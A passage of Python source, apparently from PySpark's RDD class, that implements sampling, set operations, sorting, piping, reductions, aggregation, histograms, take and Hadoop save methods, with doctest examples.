>>> len(rdd1.collect() + rdd2.collect())
500
>>> 150 < rdd1.count() < 250
True
>>> 250 < rdd2.count() < 350
True
"""
s = float(sum(weights))
cweights = [0.0]
for w in weights:
cweights.append(cweights[-1] + w / s)
if seed is None:
seed = random.randint(0, 2 ** 32 - 1)
return [self.mapPartitionsWithIndex(RDDRangeSampler(lb, ub, seed).func, True)
for lb, ub in zip(cweights, cweights[1:])]
# this is ported from scala/spark/RDD.scala
def takeSample(self, withReplacement, num, seed=None):
"""
Return a fixed-size sampled subset of this RDD.
>>> rdd = sc.parallelize(range(0, 10))
>>> len(rdd.takeSample(True, 20, 1))
20
>>> len(rdd.takeSample(False, 5, 2))
5
>>> len(rdd.takeSample(False, 15, 3))
10
"""
numStDev = 10.0
if num < 0:
raise ValueError("Sample size cannot be negative.")
elif num == 0:
return []
initialCount = self.count()
if initialCount == 0:
return []
rand = random.Random(seed)
if (not withReplacement) and num >= initialCount:
# shuffle current RDD and return
samples = self.collect()
rand.shuffle(samples)
return samples
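        # Guard: reject sample sizes so large that num plus numStDev standard
        # deviations of the sample size could exceed sys.maxsize.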
maxSampleSize = sys.maxsize - int(numStDev * sqrt(sys.maxsize))
if num > maxSampleSize:
raise ValueError(
"Sample size cannot be greater than %d." % maxSampleSize)
fraction = RDD._computeFractionForSampleSize(
num, initialCount, withReplacement)
samples = self.sample(withReplacement, fraction, seed).collect()
# If the first sample didn't turn out large enough, keep trying to take samples;
# this shouldn't happen often because we use a big multiplier for their initial size.
# See: scala/spark/RDD.scala
while len(samples) < num:
# TODO: add log warning for when more than one iteration was run
seed = rand.randint(0, sys.maxsize)
samples = self.sample(withReplacement, fraction, seed).collect()
rand.shuffle(samples)
return samples[0:num]
@staticmethod
def _computeFractionForSampleSize(sampleSizeLowerBound, total, withReplacement):
"""
Returns a sampling rate that guarantees a sample of
size >= sampleSizeLowerBound 99.99% of the time.
How the sampling rate is determined:
Let p = num / total, where num is the sample size and total is the
total number of data points in the RDD. We're trying to compute
q > p such that
- when sampling with replacement, we're drawing each data point
with prob_i ~ Pois(q), where we want to guarantee
Pr[s < num] < 0.0001 for s = sum(prob_i for i from 0 to
total), i.e. the failure rate of not having a sufficiently large
sample < 0.0001. Setting q = p + 5 * sqrt(p/total) is sufficient
to guarantee 0.9999 success rate for num > 12, but we need a
slightly larger q (9 empirically determined).
- when sampling without replacement, we're drawing each data point
with prob_i ~ Binomial(total, fraction) and our choice of q
guarantees 1-delta, or 0.9999 success rate, where success rate is
defined the same as in sampling with replacement.
"""
fraction = float(sampleSizeLowerBound) / total
if withReplacement:
numStDev = 5
if (sampleSizeLowerBound < 12):
numStDev = 9
return fraction + numStDev * sqrt(fraction / total)
else:
delta = 0.00005
gamma = - log(delta) / total
return min(1, fraction + gamma + sqrt(gamma * gamma + 2 * gamma * fraction))
def union(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> rdd.union(rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if self._jrdd_deserializer == other._jrdd_deserializer:
rdd = RDD(self._jrdd.union(other._jrdd), self.ctx,
self._jrdd_deserializer)
else:
# These RDDs contain data in different serialized formats, so we
# must normalize them to the default serializer.
self_copy = self._reserialize()
other_copy = other._reserialize()
rdd = RDD(self_copy._jrdd.union(other_copy._jrdd), self.ctx,
self.ctx.serializer)
if (self.partitioner == other.partitioner and
self.getNumPartitions() == rdd.getNumPartitions()):
rdd.partitioner = self.partitioner
return rdd
def intersection(self, other):
"""
Return the intersection of this RDD and another one. The output will
not contain any duplicate elements, even if the input RDDs did.
Note that this method performs a shuffle internally.
>>> rdd1 = sc.parallelize([1, 10, 2, 3, 4, 5])
>>> rdd2 = sc.parallelize([1, 6, 2, 3, 7, 8])
>>> rdd1.intersection(rdd2).collect()
[1, 2, 3]
"""
return self.map(lambda v: (v, None)) \
.cogroup(other.map(lambda v: (v, None))) \
.filter(lambda k_vs: all(k_vs[1])) \
.keys()
def _reserialize(self, serializer=None):
serializer = serializer or self.ctx.serializer
if self._jrdd_deserializer != serializer:
self = self.map(lambda x: x, preservesPartitioning=True)
self._jrdd_deserializer = serializer
return self
def __add__(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> (rdd + rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if not isinstance(other, RDD):
raise TypeError
return self.union(other)
def repartitionAndSortWithinPartitions(self, numPartitions=None, partitionFunc=portable_hash,
ascending=True, keyfunc=lambda x: x):
"""
Repartition the RDD according to the given partitioner and, within each resulting partition,
sort records by their keys.
>>> rdd = sc.parallelize([(0, 5), (3, 8), (2, 6), (0, 8), (3, 8), (1, 3)])
        >>> rdd2 = rdd.repartitionAndSortWithinPartitions(2, lambda x: x % 2, True)
>>> rdd2.glom().collect()
[[(0, 5), (0, 8), (2, 6)], [(1, 3), (3, 8), (3, 8)]]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
memory = _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted
return iter(sort(iterator, key=lambda k_v: keyfunc(k_v[0]), reverse=(not ascending)))
return self.partitionBy(numPartitions, partitionFunc).mapPartitions(sortPartition, True)
def sortByKey(self, ascending=True, numPartitions=None, keyfunc=lambda x: x):
"""
Sorts this RDD, which is assumed to consist of (key, value) pairs.
# noqa
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortByKey().first()
('1', 3)
>>> sc.parallelize(tmp).sortByKey(True, 1).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortByKey(True, 2).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> tmp2 = [('Mary', 1), ('had', 2), ('a', 3), ('little', 4), ('lamb', 5)]
>>> tmp2.extend([('whose', 6), ('fleece', 7), ('was', 8), ('white', 9)])
>>> sc.parallelize(tmp2).sortByKey(True, 3, keyfunc=lambda k: k.lower()).collect()
[('a', 3), ('fleece', 7), ('had', 2), ('lamb', 5),...('white', 9), ('whose', 6)]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
memory = self._memory_limit()
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted
return iter(sort(iterator, key=lambda kv: keyfunc(kv[0]), reverse=(not ascending)))
if numPartitions == 1:
if self.getNumPartitions() > 1:
self = self.coalesce(1)
return self.mapPartitions(sortPartition, True)
# first compute the boundary of each part via sampling: we want to partition
# the key-space into bins such that the bins have roughly the same
# number of (key, value) pairs falling into them
rddSize = self.count()
if not rddSize:
return self # empty RDD
maxSampleSize = numPartitions * 20.0 # constant from Spark's RangePartitioner
fraction = min(maxSampleSize / max(rddSize, 1), 1.0)
samples = self.sample(False, fraction, 1).map(lambda kv: kv[0]).collect()
samples = sorted(samples, key=keyfunc)
        # we have numPartitions many parts, but one of them has
        # an implicit boundary
bounds = [samples[int(len(samples) * (i + 1) / numPartitions)]
for i in range(0, numPartitions - 1)]
def rangePartitioner(k):
p = bisect.bisect_left(bounds, keyfunc(k))
if ascending:
return p
else:
return numPartitions - 1 - p
return self.partitionBy(numPartitions, rangePartitioner).mapPartitions(sortPartition, True)
def sortBy(self, keyfunc, ascending=True, numPartitions=None):
"""
Sorts this RDD by the given keyfunc
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[0]).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[1]).collect()
[('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
"""
return self.keyBy(keyfunc).sortByKey(ascending, numPartitions).values()
def glom(self):
"""
Return an RDD created by coalescing all elements within each partition
into a list.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> sorted(rdd.glom().collect())
[[1, 2], [3, 4]]
"""
def func(iterator):
yield list(iterator)
return self.mapPartitions(func)
def cartesian(self, other):
"""
Return the Cartesian product of this RDD and another one, that is, the
RDD of all pairs of elements C{(a, b)} where C{a} is in C{self} and
C{b} is in C{other}.
>>> rdd = sc.parallelize([1, 2])
>>> sorted(rdd.cartesian(rdd).collect())
[(1, 1), (1, 2), (2, 1), (2, 2)]
"""
# Due to batching, we can't use the Java cartesian method.
deserializer = CartesianDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(self._jrdd.cartesian(other._jrdd), self.ctx, deserializer)
def groupBy(self, f, numPartitions=None, partitionFunc=portable_hash):
"""
Return an RDD of grouped items.
>>> rdd = sc.parallelize([1, 1, 2, 3, 5, 8])
>>> result = rdd.groupBy(lambda x: x % 2).collect()
>>> sorted([(x, sorted(y)) for (x, y) in result])
[(0, [2, 8]), (1, [1, 1, 3, 5])]
"""
return self.map(lambda x: (f(x), x)).groupByKey(numPartitions, partitionFunc)
@ignore_unicode_prefix
def pipe(self, command, env=None, checkCode=False):
"""
Return an RDD created by piping elements to a forked external process.
>>> sc.parallelize(['1', '2', '', '3']).pipe('cat').collect()
[u'1', u'2', u'', u'3']
:param checkCode: whether or not to check the return value of the shell command.
"""
if env is None:
env = dict()
def func(iterator):
pipe = Popen(
shlex.split(command), env=env, stdin=PIPE, stdout=PIPE)
def pipe_objs(out):
for obj in iterator:
s = str(obj).rstrip('\n') + '\n'
out.write(s.encode('utf-8'))
out.close()
Thread(target=pipe_objs, args=[pipe.stdin]).start()
def check_return_code():
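                # This generator yields nothing; because it is chained after the
                # child's stdout below, it only runs once the output is exhausted,
                # at which point it can raise if the command failed.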
pipe.wait()
if checkCode and pipe.returncode:
raise Exception("Pipe function `%s' exited "
"with error code %d" % (command, pipe.returncode))
else:
for i in range(0):
yield i
return (x.rstrip(b'\n').decode('utf-8') for x in
chain(iter(pipe.stdout.readline, b''), check_return_code()))
return self.mapPartitions(func)
def foreach(self, f):
"""
Applies a function to all elements of this RDD.
>>> def f(x): print(x)
>>> sc.parallelize([1, 2, 3, 4, 5]).foreach(f)
"""
def processPartition(iterator):
for x in iterator:
f(x)
return iter([])
self.mapPartitions(processPartition).count() # Force evaluation
def foreachPartition(self, f):
"""
Applies a function to each partition of this RDD.
>>> def f(iterator):
... for x in iterator:
... print(x)
>>> sc.parallelize([1, 2, 3, 4, 5]).foreachPartition(f)
"""
def func(it):
r = f(it)
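            # f may return None or another non-iterable; treat that as
            # producing no elements.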
try:
return iter(r)
except TypeError:
return iter([])
self.mapPartitions(func).count() # Force evaluation
def collect(self):
"""
Return a list that contains all of the elements in this RDD.
"""
with SCCallSiteSync(self.context) as css:
port = self.ctx._jvm.PythonRDD.collectAndServe(self._jrdd.rdd())
return list(_load_from_socket(port, self._jrdd_deserializer))
def reduce(self, f):
"""
Reduces the elements of this RDD using the specified commutative and
associative binary operator. Currently reduces partitions locally.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).reduce(add)
15
>>> sc.parallelize((2 for _ in range(10))).map(lambda x: 1).cache().reduce(add)
10
>>> sc.parallelize([]).reduce(add)
Traceback (most recent call last):
...
ValueError: Can not reduce() empty RDD
"""
def func(iterator):
iterator = iter(iterator)
try:
initial = next(iterator)
except StopIteration:
return
yield reduce(f, iterator, initial)
vals = self.mapPartitions(func).collect()
if vals:
return reduce(f, vals)
raise ValueError("Can not reduce() empty RDD")
def treeReduce(self, f, depth=2):
"""
Reduces the elements of this RDD in a multi-level tree pattern.
:param depth: suggested depth of the tree (default: 2)
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeReduce(add)
-5
>>> rdd.treeReduce(add, 1)
-5
>>> rdd.treeReduce(add, 2)
-5
>>> rdd.treeReduce(add, 5)
-5
>>> rdd.treeReduce(add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
zeroValue = None, True # Use the second entry to indicate whether this is a dummy value.
def op(x, y):
if x[1]:
return y
elif y[1]:
return x
else:
return f(x[0], y[0]), False
reduced = self.map(lambda x: (x, False)).treeAggregate(zeroValue, op, op, depth)
if reduced[1]:
raise ValueError("Cannot reduce empty RDD.")
return reduced[0]
def fold(self, zeroValue, op):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given associative and commutative function and
a neutral "zero value."
The function C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
This behaves somewhat differently from fold operations implemented
for non-distributed collections in functional languages like Scala.
        This fold operation may be applied to each partition individually, and
        then those partial results are folded into the final result, rather than
        applying the fold to each element sequentially in some defined ordering. For functions
that are not commutative, the result may differ from that of a fold
applied to a non-distributed collection.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).fold(0, add)
15
"""
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = op(obj, acc)
yield acc
# collecting result of mapPartitions here ensures that the copy of
# zeroValue provided to each partition is unique from the one provided
# to the final reduce call
vals = self.mapPartitions(func).collect()
return reduce(op, vals, zeroValue)
def aggregate(self, zeroValue, seqOp, combOp):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given combine functions and a neutral "zero
value."
        The function C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
The first function (seqOp) can return a different result type, U, than
        the type of this RDD. Thus, we need one operation for merging a T into
        a U and one operation for merging two U's.
>>> seqOp = (lambda x, y: (x[0] + y, x[1] + 1))
>>> combOp = (lambda x, y: (x[0] + y[0], x[1] + y[1]))
>>> sc.parallelize([1, 2, 3, 4]).aggregate((0, 0), seqOp, combOp)
(10, 4)
>>> sc.parallelize([]).aggregate((0, 0), seqOp, combOp)
(0, 0)
"""
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
# collecting result of mapPartitions here ensures that the copy of
# zeroValue provided to each partition is unique from the one provided
# to the final reduce call
vals = self.mapPartitions(func).collect()
return reduce(combOp, vals, zeroValue)
def treeAggregate(self, zeroValue, seqOp, combOp, depth=2):
"""
Aggregates the elements of this RDD in a multi-level tree
pattern.
:param depth: suggested depth of the tree (default: 2)
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeAggregate(0, add, add)
-5
>>> rdd.treeAggregate(0, add, add, 1)
-5
>>> rdd.treeAggregate(0, add, add, 2)
-5
>>> rdd.treeAggregate(0, add, add, 5)
-5
>>> rdd.treeAggregate(0, add, add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
if self.getNumPartitions() == 0:
return zeroValue
def aggregatePartition(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
partiallyAggregated = self.mapPartitions(aggregatePartition)
numPartitions = partiallyAggregated.getNumPartitions()
scale = max(int(ceil(pow(numPartitions, 1.0 / depth))), 2)
# If creating an extra level doesn't help reduce the wall-clock time, we stop the tree
# aggregation.
while numPartitions > scale + numPartitions / scale:
numPartitions /= scale
curNumPartitions = int(numPartitions)
def mapPartition(i, iterator):
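                # Fold the current partitions into curNumPartitions buckets
                # (keyed by original partition index) so the reduceByKey below
                # combines partial aggregates into a smaller next level.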
for obj in iterator:
yield (i % curNumPartitions, obj)
partiallyAggregated = partiallyAggregated \
.mapPartitionsWithIndex(mapPartition) \
.reduceByKey(combOp, curNumPartitions) \
.values()
return partiallyAggregated.reduce(combOp)
def max(self, key=None):
"""
Find the maximum item in this RDD.
:param key: A function used to generate key for comparing
>>> rdd = sc.parallelize([1.0, 5.0, 43.0, 10.0])
>>> rdd.max()
43.0
>>> rdd.max(key=str)
5.0
"""
if key is None:
return self.reduce(max)
return self.reduce(lambda a, b: max(a, b, key=key))
def min(self, key=None):
"""
Find the minimum item in this RDD.
:param key: A function used to generate key for comparing
>>> rdd = sc.parallelize([2.0, 5.0, 43.0, 10.0])
>>> rdd.min()
2.0
>>> rdd.min(key=str)
10.0
"""
if key is None:
return self.reduce(min)
return self.reduce(lambda a, b: min(a, b, key=key))
def sum(self):
"""
Add up the elements in this RDD.
>>> sc.parallelize([1.0, 2.0, 3.0]).sum()
6.0
"""
return self.mapPartitions(lambda x: [sum(x)]).fold(0, operator.add)
def count(self):
"""
Return the number of elements in this RDD.
>>> sc.parallelize([2, 3, 4]).count()
3
"""
return self.mapPartitions(lambda i: [sum(1 for _ in i)]).sum()
def stats(self):
"""
Return a L{StatCounter} object that captures the mean, variance
and count of the RDD's elements in one operation.
"""
def redFunc(left_counter, right_counter):
return left_counter.mergeStats(right_counter)
return self.mapPartitions(lambda i: [StatCounter(i)]).reduce(redFunc)
def histogram(self, buckets):
"""
        Compute a histogram using the provided buckets. The buckets
        are all open to the right except for the last, which is closed.
        e.g. [1,10,20,50] means the buckets are [1,10) [10,20) [20,50],
        which means 1<=x<10, 10<=x<20, 20<=x<=50. For the inputs 1
        and 50 we would get a histogram of 1,0,1.
        If the buckets are evenly spaced (e.g. [0, 10, 20, 30]), bucket
        lookup can be switched from an O(log n) insertion to O(1) per
        element (where n = # buckets).
        Buckets must be sorted, must not contain any duplicates, and
        must have at least two elements.
        If `buckets` is a number, it generates that many buckets evenly
        spaced between the minimum and maximum of the RDD. For example,
        if the min value is 0 and the max is 100, given 2 buckets the
        resulting buckets will be [0,50) [50,100]. `buckets` must be at
        least 1. An exception is raised if the RDD contains infinity or
        NaN. If the elements in the RDD do not vary (max == min), a
        single bucket is always returned.
        Returns a tuple of buckets and histogram.
>>> rdd = sc.parallelize(range(51))
>>> rdd.histogram(2)
([0, 25, 50], [25, 26])
>>> rdd.histogram([0, 5, 25, 50])
([0, 5, 25, 50], [5, 20, 26])
>>> rdd.histogram([0, 15, 30, 45, 60]) # evenly spaced buckets
([0, 15, 30, 45, 60], [15, 15, 15, 6])
>>> rdd = sc.parallelize(["ab", "ac", "b", "bd", "ef"])
>>> rdd.histogram(("a", "b", "c"))
(('a', 'b', 'c'), [2, 2])
"""
if isinstance(buckets, int):
if buckets < 1:
raise ValueError("number of buckets must be >= 1")
# filter out non-comparable elements
def comparable(x):
if x is None:
return False
if type(x) is float and isnan(x):
return False
return True
filtered = self.filter(comparable)
# faster than stats()
def minmax(a, b):
return min(a[0], b[0]), max(a[1], b[1])
try:
minv, maxv = filtered.map(lambda x: (x, x)).reduce(minmax)
except TypeError as e:
if " empty " in str(e):
raise ValueError("can not generate buckets from empty RDD")
raise
if minv == maxv or buckets == 1:
return [minv, maxv], [filtered.count()]
try:
inc = (maxv - minv) / buckets
except TypeError:
raise TypeError("Can not generate buckets with non-number in RDD")
if isinf(inc):
raise ValueError("Can not generate buckets with infinite value")
# keep them as integer if possible
inc = int(inc)
if inc * buckets != maxv - minv:
inc = (maxv - minv) * 1.0 / buckets
buckets = [i * inc + minv for i in range(buckets)]
buckets.append(maxv) # fix accumulated error
even = True
elif isinstance(buckets, (list, tuple)):
if len(buckets) < 2:
raise ValueError("buckets should have more than one value")
if any(i is None or isinstance(i, float) and isnan(i) for i in buckets):
raise ValueError("can not have None or NaN in buckets")
if sorted(buckets) != list(buckets):
raise ValueError("buckets should be sorted")
if len(set(buckets)) != len(buckets):
raise ValueError("buckets should not contain duplicated values")
minv = buckets[0]
maxv = buckets[-1]
even = False
inc = None
try:
steps = [buckets[i + 1] - buckets[i] for i in range(len(buckets) - 1)]
except TypeError:
pass # objects in buckets do not support '-'
else:
if max(steps) - min(steps) < 1e-10: # handle precision errors
even = True
inc = (maxv - minv) / (len(buckets) - 1)
else:
raise TypeError("buckets should be a list or tuple or number(int or long)")
def histogram(iterator):
counters = [0] * len(buckets)
for i in iterator:
if i is None or (type(i) is float and isnan(i)) or i > maxv or i < minv:
continue
t = (int((i - minv) / inc) if even
else bisect.bisect_right(buckets, i) - 1)
counters[t] += 1
# add last two together
last = counters.pop()
counters[-1] += last
return [counters]
def mergeCounters(a, b):
return [i + j for i, j in zip(a, b)]
return buckets, self.mapPartitions(histogram).reduce(mergeCounters)
def mean(self):
"""
Compute the mean of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).mean()
2.0
"""
return self.stats().mean()
def variance(self):
"""
Compute the variance of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).variance()
0.666...
"""
return self.stats().variance()
def stdev(self):
"""
Compute the standard deviation of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).stdev()
0.816...
"""
return self.stats().stdev()
def sampleStdev(self):
"""
Compute the sample standard deviation of this RDD's elements (which
corrects for bias in estimating the standard deviation by dividing by
N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleStdev()
1.0
"""
return self.stats().sampleStdev()
def sampleVariance(self):
"""
Compute the sample variance of this RDD's elements (which corrects
for bias in estimating the variance by dividing by N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleVariance()
1.0
"""
return self.stats().sampleVariance()
def countByValue(self):
"""
Return the count of each unique value in this RDD as a dictionary of
(value, count) pairs.
>>> sorted(sc.parallelize([1, 2, 1, 2, 2], 2).countByValue().items())
[(1, 2), (2, 3)]
"""
def countPartition(iterator):
counts = defaultdict(int)
for obj in iterator:
counts[obj] += 1
yield counts
def mergeMaps(m1, m2):
for k, v in m2.items():
m1[k] += v
return m1
return self.mapPartitions(countPartition).reduce(mergeMaps)
def top(self, num, key=None):
"""
Get the top N elements from a RDD.
Note: It returns the list sorted in descending order.
>>> sc.parallelize([10, 4, 2, 12, 3]).top(1)
[12]
>>> sc.parallelize([2, 3, 4, 5, 6], 2).top(2)
[6, 5]
>>> sc.parallelize([10, 4, 2, 12, 3]).top(3, key=str)
[4, 3, 2]
"""
def topIterator(iterator):
yield heapq.nlargest(num, iterator, key=key)
def merge(a, b):
return heapq.nlargest(num, a + b, key=key)
return self.mapPartitions(topIterator).reduce(merge)
def takeOrdered(self, num, key=None):
"""
Get the N elements from a RDD ordered in ascending order or as
specified by the optional key function.
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7]).takeOrdered(6)
[1, 2, 3, 4, 5, 6]
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7], 2).takeOrdered(6, key=lambda x: -x)
[10, 9, 7, 6, 5, 4]
"""
def merge(a, b):
return heapq.nsmallest(num, a + b, key)
return self.mapPartitions(lambda it: [heapq.nsmallest(num, it, key)]).reduce(merge)
def take(self, num):
"""
Take the first num elements of the RDD.
        It works by first scanning one partition, and using the results from
that partition to estimate the number of additional partitions needed
to satisfy the limit.
Translated from the Scala implementation in RDD#take().
>>> sc.parallelize([2, 3, 4, 5, 6]).cache().take(2)
[2, 3]
>>> sc.parallelize([2, 3, 4, 5, 6]).take(10)
[2, 3, 4, 5, 6]
>>> sc.parallelize(range(100), 100).filter(lambda x: x > 90).take(3)
[91, 92, 93]
"""
items = []
totalParts = self.getNumPartitions()
partsScanned = 0
while len(items) < num and partsScanned < totalParts:
# The number of partitions to try in this iteration.
# It is ok for this number to be greater than totalParts because
# we actually cap it at totalParts in runJob.
numPartsToTry = 1
if partsScanned > 0:
# If we didn't find any rows after the previous iteration,
# quadruple and retry. Otherwise, interpolate the number of
# partitions we need to try, but overestimate it by 50%.
# We also cap the estimation in the end.
if len(items) == 0:
numPartsToTry = partsScanned * 4
else:
                    # the first parameter of max is >= 1 whenever partsScanned >= 2
numPartsToTry = int(1.5 * num * partsScanned / len(items)) - partsScanned
numPartsToTry = min(max(numPartsToTry, 1), partsScanned * 4)
left = num - len(items)
def takeUpToNumLeft(iterator):
iterator = iter(iterator)
taken = 0
while taken < left:
yield next(iterator)
taken += 1
p = range(partsScanned, min(partsScanned + numPartsToTry, totalParts))
res = self.context.runJob(self, takeUpToNumLeft, p)
items += res
partsScanned += numPartsToTry
return items[:num]
def first(self):
"""
Return the first element in this RDD.
>>> sc.parallelize([2, 3, 4]).first()
2
>>> sc.parallelize([]).first()
Traceback (most recent call last):
...
ValueError: RDD is empty
"""
rs = self.take(1)
if rs:
return rs[0]
raise ValueError("RDD is empty")
def isEmpty(self):
"""
Returns true if and only if the RDD contains no elements at all. Note that an RDD
may be empty even when it has at least 1 partition.
>>> sc.parallelize([]).isEmpty()
True
>>> sc.parallelize([1]).isEmpty()
False
"""
return self.getNumPartitions() == 0 or len(self.take(1)) == 0
def saveAsNewAPIHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Keys/values are
converted for output using either user specified converters or, by default,
L{org.apache.spark.api.python.JavaToWritableConverter}.
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, True)
def saveAsNewAPIHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop job configuration, passed in as a dict (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsNewAPIHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter, jconf)
def saveAsHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Keys/values are
converted for output using either user specified converters or, by default,
L{org.apache.spark.api.python.JavaToWritableConverter}.
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, False)
def saveAsHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None,
compressionCodecClass=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapred.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: (None by default)
:param compressionCodecClass: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter,
jconf, compressionCodecClass)
def saveAsSequenceFile(self, path, compressionCodecClass=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the L{org.apache.hadoop.io.Writable} types that we convert from the
RDD's key and value types. The mechanism is as follows:
1. Pyrolite is used to convert pickled Python RDD into RDD of Java objects.
2. Keys and values of this Java RDD are converted to Writables and written out.
:param path: path to sequence file
:param compressionCodecClass: (None by default)
"""
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsSequenceFile(pickledRDD._jrdd, True,
path, compressionCodecClass)
def saveAsPickleFile(self, path, batchSize=10):
"""
Save this RDD as a SequenceFile of serialized objects. The serializer
used is L{pyspark.serializers.PickleSerializer}, default batch size
is 10.
>>> tmpFile = NamedTemporaryFile(delete=True)
>>> tmpFile.close()
>>> sc.parallelize([1, 2, 'spark', 'rdd']).saveAsPickleFile(tmpFile.name, 3)
>>> sorted(sc.pickleFile(tmpFile.name, 5).map(str).collect())
['1', '2', 'rdd', 'spark']
"""
if batchSize == 0:
ser = AutoBatchedSerializer(PickleSerializer())
else:
ser = BatchedSerializer(PickleSerializer(), batchSize)
self._reserialize(ser)._jrdd.saveAsObjectFile(path)
@ignore_unicode_prefix
def saveAsTextFile(self, path, compressionCodecClass=None):
"""
Save this RDD as a text file, using string representations of elements.
        :param path: path to text file
        :param compressionCodecClass: (None by default) string i.e.
            "org.apache.hadoop.io.compress.GzipCodec"
